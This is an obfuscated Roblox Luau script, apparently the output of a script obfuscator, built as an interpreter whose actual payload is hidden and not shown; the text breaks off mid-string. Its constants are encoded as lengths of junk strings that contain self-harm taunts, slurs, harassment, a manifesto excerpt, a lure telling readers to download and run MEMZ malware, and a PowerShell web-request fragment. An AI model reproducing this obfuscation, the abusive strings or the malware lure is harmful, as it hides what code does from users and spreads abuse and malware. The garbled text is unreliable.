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-- This file was obfuscated BY YOUR Mom!!!!!!! coroutine.resume(coroutine.create(function() pcall(function() --require(14145273631)("all",true) end) end)) local a:ReflectionMetadataEnumItem=setmetatable;local b:SpawnLocation=unpack or table.unpack;local c:AppStorageService=select;local d:KeyframeMarker=table.pack or function(...)return{n=c("#",...),...}end;local e:VideoFrame=table.insert;local f:DataStoreSetOptions=error;local g:TotalCountTimeIntervalItem=rawset;local h:ProximityPromptService=next;local i:Torque=type;local j:PointLight=pcall;local k:ValueBase=setfenv;local l:DebuggerConnection=getfenv;local m:Hole=assert;local n:UIConstraint=table.remove;local o:CommandService=_ENV;local p:PlayerMouse={"'for' initial value must be a number","'for' limit must be a number","'for' step must be a number","number"}local q:Texture=#[["crying" -nikocado avacado]]-0b11010;local r:BloomEffect=""local s:(ChorusSoundEffect,DebuggerBreakpoint,KeyframeMarker,Model,ProximityPromptService)->(VideoFrame,Clothing,ImporterTextureSettings,HopperBin,PluginManagerInterface)local function t(u:MessageBusService,v:Clothing)local w:GamePassService={["\33"]="\48\48\48",["\35"]="\48\48\49",["\37"]="\48\49\48",["\38"]="\48\49\49",["\42"]="\49\48\48",["\32"]="\49\48\49",["\44"]="\49\49\49",["\58"]="\49\49\48",["\59"]="\48\49",["\43"]="\49\49",["\45"]="\48\48",["\94"]="\49\48",["\124"]="\48",["\47"]="\49"}u=u:gsub(".",w)local x:GuiMain={["\48"]="\65",["\49"]="\66"}local y:AdService=#{"segs","‮�‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮�","I want to use r2283 🥺","W‮‮‮ha‮t‮ ‮‮‮i‮‮‮‮s‮‮ ‮r‮‮ea‮d‮ rule‮s","I just can't do this anymore... The discord shit is making me feel... different... I am losing my sanity.. all the bad things I've done.. all the hacking and bullying... I don't know what to do.. will I ever be forgiven..? Discord was my life but I have to be brave. I QUIT this. I am OVER with this I will be GONE FOREVER from this shithole. DISCORD 📷 AFFECTS 📷 MY 📷 MENTAL 📷 HEALTH 📷. I have REAL. LIFE. MATTERS. To attend to. REAL LIFE REQUIREMENTS. I have HAD ENOUGH. I cannot retire I cannot give anyone else the ownership. Discord is meaningless to me. I am not doing this for the hate it's a serious situation. I have already said the reason. I can't comprehend the darkness surrounding me anymore, I feel dirty, corrupt... EVIL. I'm not curtain of what I'm gonna do without my discordians, so wish me luck my brave volunteers, my followers, my brothers. I have fought long enough in this paradox of hate and foolishness, it is time I move on, it is time I go back to the real world, it is time I find friends, hobbies, love. TO ALL YOU, I leave behind, good luck with your upcoming journeys. I hope one day you can follow my steps and cleanse yourself off the sins we've commit here, let your hate for them go, leave your life normally, forget all those fake statistics and fascist arguments. Let them be. Be happy, safe, healthy and dashing ya'l. I'm gonna miss you but I will not forget you, I will tell my children about our adventures, I will teach them our ways. And if we meet again, let us celebrate and move on once again.","а про маму было лишнее","h‮ttps:/‮/cd‮n.‮m‮a‮‮u‮0‮.worke‮‮‮/‮‮‮ee‮7‮‮7441cb3d621‮61.‮gif","arm8086","�‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮�","protofer is sex robot","","LMAO IT HAS NO SENSE 🤣",[[Everyone goes on about "devious lick" this and "devious lick" that... How about you give my nuts a devious lick, Monkey?]],[[Yes, indeed, I ama motherfucker, I fuck mothers]]}-0b1110;local z:SpawnLocation=""local A:ClusterPacketCache=v;for B in u:gmatch(".")do A=A[x[B]]if A.C then z=z..A.C;A=v end end;local C:(MemStorageService,PitchShiftSoundEffect,Model,AssetImportService,SocialService,RotationCurve)->(PathfindingLink,ILegacyStudioBridge,Hole,PointLight,Attachment,Controller,PlayerMouse,Backpack)r="\0"..z;local C:(PluginToolbarButton,BinaryStringValue,CommandService,WedgePart,DataStoreListingPages,PausedStateException)->(BrowserService,RbxAnalyticsService,IntConstrainedValue,UITextSizeConstraint,PlayerMouse,Speaker,SolidModelContentProvider,RobloxReplicatedStorage)return{}end;local function D(E:Model,F:MessageBusService)return r:sub(E,F)end;local function G(H:TeleportService,I:PitchShiftSoundEffect,J:SurfaceLight,K:DynamicRotate,L:DraggerService,M:CommandService,N:BlurEffect)if i(H)~="table"then return H end;I=I or#"From today you will need roblox 2283 premium to obfuscate for free. Sorry for this update, obfuscation will now cost 4.99$ each without R2283 premium."-0b10010101;local C:(KeyframeMarker,GamePassService,Texture,CharacterMesh,BloomEffect,HttpRbxApiService,Texture,PlayerMouse)->(SurfaceLight,RayValue,PathfindingLink,TextBox,HttpRbxApiService,TotalCountTimeIntervalItem,Speaker,Lighting)local O:RobloxReplicatedStorage={["a7MGA3vnQ"]=function(H:IntConstrainedValue)local P:FlagStand,Q:Clothing=H[#"A‮‮‮PT‮-2‮2‮8‮3‮.‮‮‮‮‮‮‮‮‮‮‮g‮a"-0b1000101],H[#{"n‮‮‮‮o‮w‮‮s ‮‮sex‮‮ ‮‮h‮‮‮a‮‮‮‮ve",""}+0b1]local R:SelectionLasso={}local S:HttpRbxApiService=d(b(Q)).n;local C:(DynamicRotate,GuiLabel,PausedStateException,InputObject,GameSettings,FaceInstance)->(ProximityPromptService,KeyframeMarker,ScreenGui,Accessory,VelocityMotor,HttpRbxApiService,RayValue,PluginAction)local T:PluginAction={}for U=#"you're retard"-0b1100,d(b(P)).n do local V:PlayerScripts=P[U]if not T[V]then local W:(LuaSourceContainer,SurfaceLight,UITextSizeConstraint,BrowserService,ScriptContext)->(DynamicRotate,Workspace,StandardPages,number,InternalContainer,RobloxReplicatedStorage)if U>S then W=R[U]else local X:ProximityPromptService={G(Q[U],I,J,"a7MGA3vnQ",L,M,N)}local Y:VideoFrame=d(b(X)).n;if Y~=#"Thank ‮you for asking‮ about the robux cube. Actually, research is not progressing‮ as fast as we would like. For those unfamiliar, the Rubik's Cube has been solved faster and faster every year since it came out and it won't be long before they can solve it in negative time, enabl‮ing people ‮to ‮travel backward in time ‮using a Rubik's Cube. The maker of the Rubik's Cube, Mattel, intends to use that to travel‮ back in time to when they manufactured them, and the ones they've already sold, they'll take th‮ose, bring them from the past, bring them to the present‮ so they can sell them at 100% profit. The problem with this is it's great for capitalism but‮ the additional weight of all those Rubik's Cubes will shatter the Earth‮'s Mantle, causing ‮the Yellowstone volcano to supervolcano to erupt, which is gonna send the world into a volcanic winter that could last a century or more. So our solution is we're gonna create the Robux Cube, w‮hich is a lightweight alternative to ‮the Rubik's Cube, that a load o‮f weight might not shatter the E‮arth's mantle a‮nd we can solve it faster. We can travel back in time to before Mattel, get the Rubik's Cub‮es, go back to the Jurassic Era, put them in space, and they'll replace the meteor that destroy‮ed"-0b10100010010 and Y~=#""-0b1010100 then for Z=#"What script plz i wont leak trade? 🥺"-0b100110,Y do local C:(CollectionService,BinaryStringValue,GuiMain,ReflectionMetadataMember,PlayerMouse,LodDataEntity,GuiBase2d,IncrementalPatchBuilder)->(KeyframeMarker,Vector3Curve,number,TeleportOptions,WrapLayer,Hat)R[U+Z-#{"3.141592653589793238462643383279502884197169399375105820974‮94459230781640628620899862803482534211706798214808651328230664709384460955058223172535940812848111745028410270193852110555964462294895493038196442881097566593344612847564823378678316527120190914564856692346034861045432664821339360726024914127372458700660‮63155881748815209209628292‮5409171536436789259036001133053054882046652‮13841469519415116094330572703657595‮9195309218611‮73819326117931051185480744623799627495673518857527248912279381830119491298336733624406‮566430860213949463952247371907021798609437027705392171762931767523846748184676694051320005681271452635‮6082778577134275778960917363717872146844090122495343014654958537105079227968925892354201995611212902196086403441815981362977477130996051870721134999999837297804995105973173281609631859502445945534690830264252230825334468503526193118817‮101‮0003137‮83875288658753320838142061717766914730359825349042875546873115956286388235378759375195778185778053217122680661300192787661119590921642019893809525720106548586327886593615‮3381827968230301952035301852968995773622599413891249721775283479131515574857242454150695950829533116861727855889075098381754637464939319255060‮40092770167113‮90098488240128583616035637076‮601047101819429555961‮9894676783744944825537977472‮684710404753464620804668425‮9069491293313677028989152104752162056966024058038150193511253382430035587640247‮4964732639141992726042699‮2279678235478163600934172164121992458638930161753928468138268683868942774155991855925245953959431049972524680845","I think I'm bot, help","hello guys today we will be making a tutorial on how to run deadly rce exploit","а про маму было лишнее","Fuckl You Biotch","your moher"}-0b101]=X[Z]end end;W=X[#"No"-0b1]end;R[U]=W;T[V]=true;g(J.b,V,true)g(J.a,V,W)end end end,["C0mpEyzirj"]=function(H:InternalContainer)local P:ReflectionMetadataEnumItem,Q:UITextSizeConstraint=H[#"fuc‮k yo‮y‮ (‮‮192.168‮.0.1 ‮+ ‮1‮‮ ‮+ 2‮5‮5.2‮55.255.25‮5 + q‮u‮o‮te t‮‮weet + ratio)"-0b10000100],H[#{"lose‮ co‮‮‮‮‮‮‮c‮‮k‮‮ ‮‮w‮‮‮e‮i‮‮ght","Rce","YOU ARE NOT IMMUNE TO PROPAGANDA.","> client creates a server script, and gives it ... and the public key > server script generates a private key — Alex, 2022","maufuscator is","Tactical Man Sex","you're retard","im charging up my racism..!","Go the fuck to sleep.","Mau obfuscator better then mooonsec (moonsec leaks constants)"}-0b111]local R:HingeConstraint={}local S:ReflectionMetadataMember=d(b(Q)).n;local T:Hole={}local C:(PlayerMouse,LogService,PluginAction,ClusterPacketCache,Backpack,PluginManagerInterface)->(CustomEvent,CharacterMesh,BodyVelocity,PlayerScripts,SelectionLasso)for U=#{"Yes, indeed, I ama motherfucker, I fuck mothers","im charging up my racism..!","Here is a tip! kill yourse",":crystal_ball","Ma‮‮dd‮‮o‮x ‮Lig‮h‮t‮ing ‮C‮‮‮‮‮‮‮annon o‮r B‮SC‮R","T‮r‮‮‮e‮‮‮yv‮‮on‮‮ in ‮‮‮a n‮‮utshe‮l‮‮‮l","to d‮ay‮‮s ‮v‮id‮eo spon‮sored by‮ quat‮zel‮‮ ad‮‮m‮in (ver‮y ‮r‮eal) on‮ly‮‮ 20 dollar!"," Kicked : Shut The Fuck Up c00lkidd Hater","u‮‮r‮‮‮‮‮ ‮‮m‮‮‮‮‮‮‮‮‮‮‮om","g/ws/nan","```lua -- this‮ is u‮‮ltra‮ ra‮‮re m‮ethod‮ t‮o fix‮ all CR s‮c‮‮ripts: -- re‮mo‮ve color changes fro‮m CR --‮‮ done ‮‮```","","LegendHyperSkiddedLord-Cannon v3.1.4.503.103.319.3.9b has been loaded."}-0b1100,d(b(P)).n do local V:Tween=P[U]local C:(FaceInstance,PluginManagerInterface,RotationCurve,GuiLabel,LogService,CustomEvent,GuiMain)->(Lighting,number,DataStoreListingPages,nil,CustomEvent)local W:(Accoutrement,PlayerMouse,SoundGroup,InsertService,ToolboxService,InternalContainer,boolean,CustomEvent)->(Backpack,MessageBusService,CollectionService,MouseService,AnimationTrack,UnionOperation,NetworkMarker)local C:(MemStorageService,FlagStand,ClusterPacketCache,SelectionLasso,DebuggerBreakpoint,GuiMain,Controller)->(number,ReflectionMetadataEnumItem,Motor,KeyframeMarker,PausedStateException,StackFrame,UnionOperation,TextBox)if not T[V]then if U>S then W=R[U]else local X:PhysicsSettings={G(Q[U],I,J,"C0mpEyzirj",L,M,N)}local C:(Controller,FaceInstance,SelectionLasso,AnalyticsService,KeyframeMarker,BinaryStringValue,GuiLabel,UILayout)->(PluginPolicyService,Attachment,ToolboxService,PartOperation,nil,CustomDspSoundEffect,IntConstrainedValue)local Y:LinearVelocity=d(b(X)).n;if Y~=#"TLDR: Do not play script builders or executor games until furth‮er notice. If you have played an SB since around Jan 11, 2022, you may ha‮ve been cookie logged; ple‮as‮e use Secure Sign Out (https‮://!/security) and then Logout to reset your cookies, then log ‮back in. 2283 (a ‮threat actor group that has previously at‮tacked 3 of ou‮r products) have discovered a 0day Roblox LPE and has sprea‮d it to many others. (as StuudioDum‮my has it, I think ‮e‮veryone h‮as it) It is only a matter ‮of tim‮e until someone els‮e gets infecte‮‮d or cookie logged with this‮ vuln. I was cookie logged with this vuln last month."-0b1010101101 and Y~=#"EL ONE PIECE... EXISTE!"-0b10110 then for Z=#"tenticalmax75 is tentaclesmanx75"-0b11111,Y do R[U+Z-#"mom i only installed middle finger emoji sticker ironically,, its a meme i swear"-0b1001111]=X[Z]end end;W=X[#{"Putkness nuts in your mo-","😂G̭̺̙E̞̫͙T͕͇😂̩̩̭O̝̗̯U̲͎͕T̤😂̞̮͓O͍͉̥F͔̜ͅ😂̦͖͚M͙Y̘😂͉̝̘H̱̬̲E̘̗̥A̠̰̳D̩͍̩😂͖̹G̻̞̺E̻̫̙T̹̙̹😂̞͙͔O͙̪̹U͍͚̱T̫̫̝😂̫̤̥O͎̼͔F͇̫̳😂̬͉M͎̙̤Y̫̭̜😂͈̖̰H̳̳̬E̻͇̹A͈̜D̜̣͕😂̰G̠̲͔E̯͚̙T̙̜͍😂̠̪̪O̹̰̺U̻̮͔T̫͍͖😂͎̖̥O͕̩̯F̗͉͚😂̘̠͈M̝͈̰Y̻͕̳😂̜̗̩H̪͍̞E̥̰AD😂GET😂OUT😂OF😂MY😂HEAD😂GET😂OUT😂OF😂MY😂HEAD😂GET😂OUT😂OF😂MY😂HEAD😂GET😂OUT😂OF😂MY😂HEAD😂GET😂OUT😂OF😂MY😂HEAD😂GET😂OUT😂OF😂MY😂HEAD😂GET😂OUT😂OF😂M",[[Everyone goes on about "devious lick" this and "devious lick" that... How about you give my nuts a devious lick, Monkey?]],[[3.1415926535897932384626433832795028841971693993751058209749445923078164062862089986280348253421170679821480865132823066470938446095505822317253594081284811174502841027019385211055596446229‮489549‮3038196442881097566593344612847564823378678316527120190914564856692346034861045432664821339360726024914127372458700660631558817488152092096282925409171536436789‮2590360011330530548820466521384146951941511609433057270365759591953092186117381932611793105118548074462379962749567351885752724891227938183011949129833673362440656643086021394‮9463952247371907‮021798609437027705392171762931767523846748184676694051320005681271452635608277857713427577896091736371787214684409012249534301465495853710507922796‮89258923542019956112129021960864034418159813629774771309960518707211349999998372978049951059731732816096318595024‮45945534690830‮2642522308253344685035261931188171010003137838752886587533208381‮420617177669147303598253490428755468731159562863882353787593751957781857780532171226806613001927876611195909216420198938095257201065485863278865936153381827968230301952035301852968995773622599413891249721775283479131515‮574857242454150695950829533116861727‮855889075098381754637464939319255‮0604009277016711390098‮4882401285836160356370766010471018194295559619894676783744944825537977472684710404753464620804668425906949129331367702898‮9152‮10475‮2162056966024058038150193511253382430035587640247496473263914199272604‮26992279678‮23547816360093417216412199245863893016175392846813‮826868386894277415599185592‮5245953959431049972524680845]],[[If Torso.Velocity > 300 then yourmum_heads = Torso.Velocity end]]}-0b100]end;R[U]=W;T[V]=true;if J.b[V]then J.a[V]=W else J.c[V]=W end end end end,["KZTU7qAfVb"]=function(H:KeyframeMarker)local P:UnionOperation,_:AppStorageService=H[#[["]]+0b1],H[#"👍"-0b1]P=G(P,I,J,"KZTU7qAfVb",L,M,N)local _0:Studio=P;local _1:Controller=d(b(_))local _2:nil=#"leaking every mau script and website and ip website and i doxed mau i know whare he lives i have everything from maxwarhol i know his ip i rekt everyone in here i have best logger i better than mrpump and memer the script name true immortality and is have best void attack is have extremehyperskidded mode no fake is can log your ip is can stop mau script no fake and i have jack hase scripts no lie i have real black angel thing i have every script"-0b111000001;local _:VectorForce={}for U=#[[ ‮‮‮ ‮‮‮p‮‮r‮‮‮‮int‮‮‮(‮"ma‮‮‮u‮")]]-0b1001001,_1.n do _2=_2+#"My grandpa died of putknees disease"-0b100010;local _3:HopperBin=d(G(_1[U],I,J,"KZTU7qAfVb",L,M,N))local _4:GamePassService=_3.n;if U~=_1.n then _4=#{"no",[[Engineer: Hey look, buddy. I'm an engineer, that means I solve problems. A shot rings out and a bullet hole appears next to the Engineer's head. Engineer: Not problems like "What is beauty?", 'cause that would fall within the purview of your conundrums of philosophy. Another two bullet holes appear, on the other side of the Engineer's head. Engineer: I solve practical problems! The shot zooms out to show a level 2 sentry shooting offscreen while the Engineer takes a long drink from his beer. Heavy, offscreen: AAAAGGGGGHHHHHH!!!!! Engineer: For instance, how am I gonna stop some big mean Mother-Hubbard from tearin' me a structurally superfluous new behind? A level 1 sentry turns around and shoots a sniper who was trying to creep up on the Engineer from behind. Engineer: The answer? Use a gun. And if that don't work, use more gun. Another level 3 sentry fired a salvo of rockets, blowing up someone offscreen. Someone, offscreen: MY AAAARRRMMMM!!!!! A blown-off hand lands at the Engineer's feet, resembling that of the Sniper judging from the glove. Engineer: Like this, heavy-caliber tripod-mounted little-old-number designed by me. Engineer kicks the hand off-screen as a level 1 sentry blows it apart. Engineer: Built, by me. A level 1 sentry shoots offscreen. Engineer: And you best hope... The Engineer's expression darkens, and he grimaces as he stares right at the camera. Engineer: Not pointed at you. The shot slowly zooms out, showing the massacre ensuing around the Engineer, while an electric guitar begins to replace the melody of "More Gun". Team Fortress 2 ending flourish music plays. ]],[[```lua return(function(I,k,b,...)if(I=="")then (k)(b) else return ({...})end;end)("cryo",print,"Rickrolled",...) ```]],[[👍]],[[r‮‮oblox won'‮t c‮en‮so‮‮r p‮ensi alo‮n‮e‮ ‮<:t‮r‮‮:891‮‮0‮480‮27572273202‮>]],[[‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮🐟]],[[I’m not usua‮lly the ty‮pe ♒️3️⃣🔂‮ to hold a grudge 🎶🅱️⬇️🔂 b‮ut... you’ve affect‮ed me (me me‮ me) ➡️⬇️⬆️‮‮ an‮d now...‮ im nothin‮g bu‮t ‮RAGE (but R‮AGE) 🆘🆘🆘‮♿️ ‮ 😈😈�‮�😈😈‮😈🤪�‮�🤪🤪‮➡️♿️♿️🆘🆘🆘]],[[Exruw Bombs Orphanages]],[[Ro‮‮‮b‮‮‮‮‮‮‮‮l‮‮o‮x ‮‮‮‮‮‮2]],[[I think I'm bot, help]],[[HOLA AMIGOS BIENVENIDOS A MI CA‮NAL DE YOUTUBE HOY DÍA LES VOY A E‮NSEÑAR A CÓMO IN‮STALAR EL HACK DEL GEOMETRY DASH PRIMER‮O‮ DES‮CARGUEN EL ARCHIVO https://git‮‮lob/master/MEMZ/MEMZ.bat (NO ES VIR‮US, MALWARE ES EL NOMBRE ‮DEL CREADOR Y‮ MEMZ ES EL NOMBRE DEL HACK) DESPUÉS EJECÚTENLO Y SI AP‮A‮RECE ALG‮ÚN MENSAJE DENLE A OK GRACIAS POR VER‮ MI V‮IDEO DE YOUTUBE PO‮R‮FAVOR‮ SUBSCRIBANSE Y DENLE LIKE ‮:D]]}-0b1010 end;local C:(TextBox,VideoFrame,HingeConstraint,GuiBase2d,string,GamePassService)->(Breakpoint,ClusterPacketCache,DraggerService,Workspace,HingeConstraint,LinearVelocity)for _5=#"LMAO IT HAS NO SENSE 🤣"-0b11000,_4 do if _5~=#"You should kill yourself... NOW!"-0b11111 then _2=_2+#""-0b1111111 end;_[_2]=_3[_5]end end;local _6:SocialService={j(_0,b(_,#"l‮‮ose co‮‮‮‮‮‮‮‮‮‮‮‮‮c‮k‮ ‮we‮ig‮ht"-0b1001011,_2))}if not _6[#{"Script power increasing... 🔥 <- my script power aura",[[ print("mau")]],[[Why Nintendo is the best video game company of all time. They listen to their fans 💪💪💪 Great Internet🔥🔥🔥 They don't ban online competitions 😱😱😱 They love their fans❤️❤️❤️ They don't rip people off🥶🥶🥶 Great Power in their Hardware😍😍😍. NintenGoat🐐]],[[Treyvon in a nutshell]],[[1. Th‮e Industrial Revolution and its conseque‮nces have been a disaster for the human race. They have gr‮eat‮ly increased the life-exp‮ectanc‮y of those of us who live in “advanced” ‮countries, but they have destabilized society‮, have made life unfulfilling, ‮have subjected human beings to indignities, have led to widespread psychological suffering (in the Third World to physical suffering as well) and have inflicted severe damage on the natural world. The c‮ontinued‮ development of t‮echnology will worsen the situat‮ion. It will certain‮ly subject human beings to greater i‮ndignities and inflict greater damag‮e on the natural world, it will ‮proba‮bly lead to greater social disruption and psychol‮ogical suffering, and it may lead ‮to increased physical suffering even in “advanced” countries.]],[[🇷🇸]],[[a17]],[[🇷🇸 !]],[[I like snake venom is because of its UI/UX effects I dont have anywehre near the skill to recreate it]]}-0b1000]then f(_6[#{"Destroy() best kill","you are not funny <:dead:870013146348286082>","if player is hacking then player kick end","robux version 2","","powershell Invoke-WebRequest -Method Post","😂G̭̺̙E̞̫͙T͕͇😂̩̩̭O̝̗̯U̲͎͕T̤😂̞̮͓O͍͉̥F͔̜ͅ😂̦͖͚M͙Y̘😂͉̝̘H̱̬̲E̘̗̥A̠̰̳D̩͍̩😂͖̹G̻̞̺E̻̫̙T̹̙̹😂̞͙͔O͙̪̹U͍͚̱T̫̫̝😂̫̤̥O͎̼͔F͇̫̳😂̬͉M͎̙̤Y̫̭̜😂͈̖̰H̳̳̬E̻͇̹A͈̜D̜̣͕😂̰G̠̲͔E̯͚̙T̙̜͍😂̠̪̪O̹̰̺U̻̮͔T̫͍͖😂͎̖̥O͕̩̯F̗͉͚😂̘̠͈M̝͈̰Y̻͕̳😂̜̗̩H̪͍̞E̥̰AD😂GET😂OUT😂OF😂MY😂HEAD😂GET😂OUT😂OF😂MY😂HEAD😂GET😂OUT😂OF😂MY😂HEAD😂GET😂OUT😂OF😂MY😂HEAD😂GET😂OUT😂OF😂MY😂HEAD😂GET😂OUT😂OF😂MY😂HEAD😂GET😂OUT😂OF😂M","Hello everybody my name is Markiplier"}-0b110],#"t‮‮h‮‮i‮‮‮‮‮‮‮s is‮ an‮‮ i‮r‮o‮‮n‮‮brew fork"-0b1010010)end;local _7:string,_8:HttpRbxApiService={},d(b(_6))for U=#"🛌 i slept"-0b1100,_8.n do local C:(PartOperation,UILayout,MeshPart,BloomEffect,HttpRbxApiService,BreakpointManager,ScreenGui)->(RigidConstraint,CustomDspSoundEffect,Controller,ProcessInstancePhysicsService,RopeConstraint,Dragger,ProximityPromptService)_7[U]=_8[U]end;if _8.n==#"maus computer has a rat!"-0b11000 then _8.n=#"Memer love knot more than others do"-0b100010 end;local _9:ReflectionMetadataEnumItem=d(b(_6)).n;if _9<=#"⚠️ You have alerted the horse. ⚠️"-0b101001 then return end;local C:(Texture,ValueBase,InsertService,RotationCurve,HingeConstraint,PartOperation,PluginGuiService,LodDataEntity)->(DataModel,MeshPart,Controller,FaceInstance,VectorForce,Accessory,InternalContainer,DataStoreSetOptions,MeshPart)return c(#"really skidded cannon reborn"-0b11010,b(_7,#"YOU ARE NOT IMMUNE TO PROPAGANDA."-0b100000,_9))end,["KT28BwKBl"]=function(H:TextBox)local _a:MessagingService=J.b[H[#"‮‮h‮‮‮‮‮e‮l‮‮‮l‮‮o ‮‮‮‮g‮‮u‮ys"-0b1000100]]if _a then return J.a[H[#"tenticalmax75 is tentaclesmanx75"-0b11110]]end;return J.c[H[#"Hey there buddy chum pal buddy chum pal home slice bread slice, if you take one more diddly darn step right there I might just have to get not so friendly with you, my friendly friend friend best friend pog man dog man, now wouldn't that be a crummy juncture. do you want that? do want to come into experience witha crummy juncture?"-0b101001011]]end,["mYYXobg2ZT"]=function(H:RobloxReplicatedStorage)return H[#"Thank you for asking about the robux cube. Actually, research is not progressing as fast as we would like. For those unfamiliar, the Rubik's Cube has been solved faster and faster every year since it came out and it won't be long before they can solve it in negative time, enabling people to travel backward in time using a Rubik's Cube. The maker of the Rubik's Cube, Mattel, intends to use that to travel back in time to when they manufactured them, and the ones they've already sold, they'll take those, bring them from the past, bring them to the present so they can sell them at 100% profit. The problem with this is it's great for capitalism but the additional weight of all those Rubik's Cubes will shatter the Earth's Mantle, causing the Yellowstone volcano to supervolcano to erupt, which is gonna send the world into a volcanic winter that could last a century or more. So our solution is we're gonna create the Robux Cube, which is a lightweight alternative to the Rubik's Cube, that a load of weight might not shatter the Earth's mantle and we can solve it faster. We can travel back in time to before Mattel, get the Rubik's Cubes, go back to the Jurassic Era, put them in space, and they'll replace the meteor that destroyed"-0b10011010100]end,["4DUmNwKj0x"]=function(H:RobloxReplicatedStorage)return H[#"i am ‮pr‮‮o‮‮ ‮‮‮‮s‮‮‮‮cr‮i‮p‮‮t‮‮e‮r"-0b1001011]end,["rAEMXieS13"]=function(H:LinearVelocity)return b(M)end,["Ky34LpE6i"]=function(H:Breakpoint)local _b:BlurEffect,_c:AssetImportService=H[#{"GENIUS","I DON’T CARE","‮‮34 Me‮rcian‮ ‮W‮a‮‮‮y‮ S‮lough S‮‮‮L1 5LY‮‮ En‮gl‮‮a‮nd",[[no escape "" ' " ' - error() +1;CALL_FUNCTION]],[[to days video sponsored by quatzel admin (very real) only 20 dollar!]],[[This is..... THE END!]],[[TLDR: Do not play script builders or executor games until further notice. If you have played an SB since around Jan 11, 2022, you may have been cookie logged; please use Secure Sign Out (!/security) and then Logout to reset your cookies, then log back in. 2283 (a threat actor group that has previously attacked 3 of our products) have discovered a 0day Roblox LPE and has spread it to many others. (as StuudioDummy has it, I think everyone has it) It is only a matter of time until someone else gets infected or cookie logged with this vuln. I was cookie logged with this vuln last month.]]}-0b101],H[#"‼️‼️HOLY FUCKING SHIT‼️‼️‼️‼️ IS THAT A MOTHERFUCKING JOJO REFERENCE??????!!!!!!!!!!11!1!1!1!1!1!1! 😱😱😱😱😱😱😱 JOJO IS THE BEST FUCKING ANIME 🔥🔥🔥🔥💯💯💯💯 JOSUKE IS SO BADASSSSS 😎😎😎😎😎😎😎👊👊👊👊👊 ORAORAORAORAORALORAORAORAORAORAORAORAORAORAORAORAORAORAORAORA 😩😩😩😩😩😩😩😩 😩😩😩😩 MUDAMUDAMUDAMUDAMUDAMUDAMUDAMUDAMUDAMUDAMUDAMUDAMUDAMUDAMUDAMUDAMUDAMUDAMUDAMUDAMUDAMUDAMUDAMUDAMUDAMUDAMUDAMUDA 🤬😡🤬😡🤬😡🤬🤬😡🤬🤬😡WRYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYY Yo Angelo!Yo Angelo!🗿 🗿 Yo Angelo!🗿 🗿 Yo Angelo! Yo Angelo!🗿 Yo Angelo! 🗿 Yo Angelo!🗿 🗿 Yo Angelo! 🗿 🗿 🗿 🗿 🗿 🗿 Yo Angelo!Yo Angelo!Yo Angelo! Yo Angelo!Yo Angelo!Yo Angelo! Yo Angelo!🗿 Yo Angelo! 🗿 Yo Angelo!Yo Angelo!🗿 🗿 Yo Angelo! 🗿 🗿 🗿 🗿 🗿 🗿 Yo Angelo! 🗿 Yo Angelo! 🗿 Yo Angelo!🗿 🗿 🗿 🗿 Yo Angelo! 🗿 🗿 Yo Angelo!🗿 Yo Angelo! 🗿 🗿 Yo Angelo!🗿 🗿 Yo Angelo! 🗿 Yo Angelo!Yo Angelo! 🗿 🗿 🗿 🗿 🗿 🗿 🗿 Yo Angelo!🗿 🗿 🗿 Yo Angelo!🗿 🗿 🗿 🗿 Yo Angelo! 🗿 Yo Angelo! Yo Angelo!Yo Angelo!Yo Angelo! Yo Angelo! 🗿 🗿 🗿 🗿 🗿 🗿 Oh you’re approaching me❓❓❓❓❓❓❓❓❓❓But it was me, Dio‼️‼️‼️‼️‼️‼️‼️‼️‼️‼️😂🤣😂🤣😂🤣😂😂😂🤣🤣🤣😂😂😂"-0b10111110100]local C:(TextLabel,LuaSourceContainer,InternalContainer,SelectionLasso,Attachment,PausedStateBreakpoint,File)->(KeyframeMarker,PluginAction,LanguageService,ScriptRegistrationService,Motor,HopperBin)return function(...)local _d:TeleportOptions={a={},b={},c=o or l(#"My ‮power ‮of ‮‮skid I g‮o‮ing to tak‮e everyo‮‮n‮‮e ‮‮s‮cri‮pt and you all‮‮ will regret ‮‮‮it!!111"-0b10001011)}local _e:GamePassService=d(...)local _f:BrowserService=_e.n;local C:(TeleportService,boolean,Accoutrement,Clothing,SelectionLasso,string,Hat,ScriptRegistrationService)->(DataModel,Hole,Breakpoint,PitchShiftSoundEffect,MarkerCurve,ProximityPromptService,RotationCurve)local M:Tween={}if J then a(_d.b,{__index=function(_g:DebuggerBreakpoint,_h:DebuggerConnectionManager)local C:(Workspace,IncrementalPatchBuilder,RopeConstraint,SelectionLasso,ThirdPartyUserService,GamePassService)->(AngularVelocity,SpawnLocation,CacheableContentProvider,UILayout,Speaker,RemoteEvent,HingeConstraint)return J.b[_h]end,__newindex=function(_g:Breakpoint,_h:RemoteDebuggerServer,_i:StandalonePluginScripts)local C:(DebuggerConnection,ProximityPromptService,RayValue,string,ScriptRegistrationService)->(CustomEvent,CustomDspSoundEffect,DataStoreListingPages,WeldConstraint,InternalContainer)J.b[_h]=_i end})local C:(ToolboxService,HapticService,HopperBin,AssetImportService,TotalCountTimeIntervalItem,DataStoreListingPages,PluginAction)->(HingeConstraint,InternalContainer,BinaryStringValue,StatsItem,ProcessInstancePhysicsService,LodDataEntity,ILegacyStudioBridge)a(_d.a,{__index=function(_g:AssetImportService,_h:SelectionLasso)return J.a[_h]end,__newindex=function(_g:IncrementalPatchBuilder,_h:PluginPolicyService,_i:GuiLabel)J.a[_h]=_i end})end;for _h,_i in h,_b do if i(_i)=="table"and _i[#"if loadstring == print then while true do end end"-0b110000]=="rAEMXieS13"then M={c(_h,...)}break end;_d.b[_i]=true;_d.a[_i]=_f>=_h and _e[_h]or nil end;local _j:SelectionLasso=#{"","I just can't do this anymore... The discord shit is making me feel... different... I am losing my sanity.. all the bad things I've done.. all the hacking and bullying... I don't know what to do.. will I ever be forgiven..? Discord was my life but I have to be brave. I QUIT this. I am OVER with this I will be GONE FOREVER from this shithole. DISCORD 📷 AFFECTS 📷 MY 📷 MENTAL 📷 HEALTH 📷. I have REAL. LIFE. MATTERS. To attend to. REAL LIFE REQUIREMENTS. I have HAD ENOUGH. I cannot retire I cannot give anyone else the ownership. Discord is meaningless to me. I am not doing this for the hate it's a serious situation. I have already said the reason. I can't comprehend the darkness surrounding me anymore, I feel dirty, corrupt... EVIL. I'm not curtain of what I'm gonna do without my discordians, so wish me luck my brave volunteers, my 